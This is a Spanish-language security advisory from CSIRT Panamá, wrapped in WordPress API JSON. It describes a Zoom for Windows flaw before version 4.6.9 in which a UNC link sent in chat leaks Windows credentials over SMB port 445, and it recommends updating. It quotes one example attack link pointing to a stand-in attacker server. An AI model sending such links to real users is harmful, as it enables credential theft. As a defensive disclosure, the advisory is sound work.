{"id":2004,"date":"2020-04-08T10:20:13","date_gmt":"2020-04-08T15:20:13","guid":{"rendered":"https:\/\/cert.pa\/?p=2004"},"modified":"2020-04-08T16:26:42","modified_gmt":"2020-04-08T21:26:42","slug":"csirt-panama-aviso-2020-04-07-robo-de-credenciales-de-windows-desde-zoom","status":"publish","type":"post","link":"https:\/\/cert.pa\/?p=2004","title":{"rendered":"CSIRT Panam\u00e1 Aviso 2020-04-07 Robo de credenciales de Windows desde Zoom"},"content":{"rendered":"\n

CSIRT Panam\u00e1 Aviso 2020-04-07 Robo de credenciales de Windows desde Zoom
Gravedad: Alta
Fecha de publicaci\u00f3n: abril 7, 2020
\u00daltima revisi\u00f3n: abril 7, 2020<\/p>\n\n\n\n

Sistemas Afectados:
\nZoom versiones anteriores a 4.6.9<\/p>\n\n\n\n

I. Descripci\u00f3n
El software Zoom ampliamente utilizado tiene una vulnerabilidad que permite a los atacantes robar las credenciales de su sistema operativo.
El descubrimiento de esta vulnerabilidad se produce cuando el uso de Zoom se ha incrementado a ra\u00edz de la pandemia de COVID-19.
Con un gran n\u00famero de personas que trabajan desde casa, conf\u00edan en Zoom para conectarse con compa\u00f1eros de trabajo, clientes y socios.
Muchos de estos usuarios dom\u00e9sticos se est\u00e1n conectando a redes de trabajo sensibles a trav\u00e9s de medios temporales que no tienen el beneficio de los firewalls de nivel empresarial que se encuentran en las instalaciones.<\/p>\n\n\n\n

II. Problemas Conocidos
Si bien el ataque solo funciona contra usuarios de Windows, los ataques pueden iniciarse enviando a los objetivos una ubicaci\u00f3n UNC en un mensaje de texto. Ejemplo: \\\\evil.server.com\\images\\cat.jpg.
Cuando los usuarios de Windows hacen clic en el enlace mientras est\u00e1n conectados a ciertas m\u00e1quinas o redes no seguras, la aplicaci\u00f3n Zoom enviar\u00e1 las credenciales a trav\u00e9s del puerto 445, que se utiliza para transmitir el tr\u00e1fico relacionado con los servicios de Windows SMB
y Active Directory.<\/p>\n\n\n\n

En el caso de que el puerto 445 est\u00e9 cerrado a Internet, ya sea por un dispositivo o firewall de red o por un ISP que lo bloquea, el ataque no funcionar\u00e1.
\nProducto de COVID-19, millones de personas est\u00e1n trabajando desde casa sin los mismos niveles de soporte de TI y seguridad que obtienen cuando trabajan en sus empresas. <\/p>\n\n\n\n

III. Referencia a soluciones, herramientas e informaci\u00f3n
\nActualizar a la ultima versi\u00f3n de Zoom:
\nhttps:\/\/zoom.us\/client\/latest\/ZoomInstaller.exe<\/p>\n\n\n\n

IV. Informaci\u00f3n de contacto
\nCSIRT PANAMA
\nComputer Security Incident Response Team Autoridad Nacional para la Innovacion Gubernamental
\nE-Mail: info@cert.pa
\nPhone: +507 520-CERT (2378)
\nWeb: https:\/\/cert.pa
\nTwitter: @CSIRTPanama
\nFacebook: http:\/\/www.facebook.com\/CSIRTPanama
\nKey ID: 16F2B124<\/p>\n","protected":false},"excerpt":{"rendered":"

CSIRT Panam\u00e1 Aviso 2020-04-07 Robo de credenciales de Windows desde Zoom Gravedad: Alta Fecha de publicaci\u00f3n: abril 7, 2020 \u00daltima revisi\u00f3n: abril 7, 2020 Sistemas Afectados: Zoom versiones anteriores a 4.6.9 I. Descripci\u00f3n El software…<\/p>\n","protected":false},"author":4,"featured_media":2005,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[4],"tags":[124,68,45,123],"class_list":["post-2004","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-avisos-de-seguridad","tag-teletrabajo","tag-vulnerabilidades","tag-windows","tag-zoom"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/posts\/2004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/cert.pa\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2004"}],"version-history":[{"count":3,"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/posts\/2004\/revisions"}],"predecessor-version":[{"id":2008,"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/posts\/2004\/revisions\/2008"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cert.pa\/index.php?rest_route=\/wp\/v2\/media\/2005"}],"wp:attachment":[{"href":"https:\/\/cert.pa\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2004"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cert.pa\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2004"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cert.pa\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}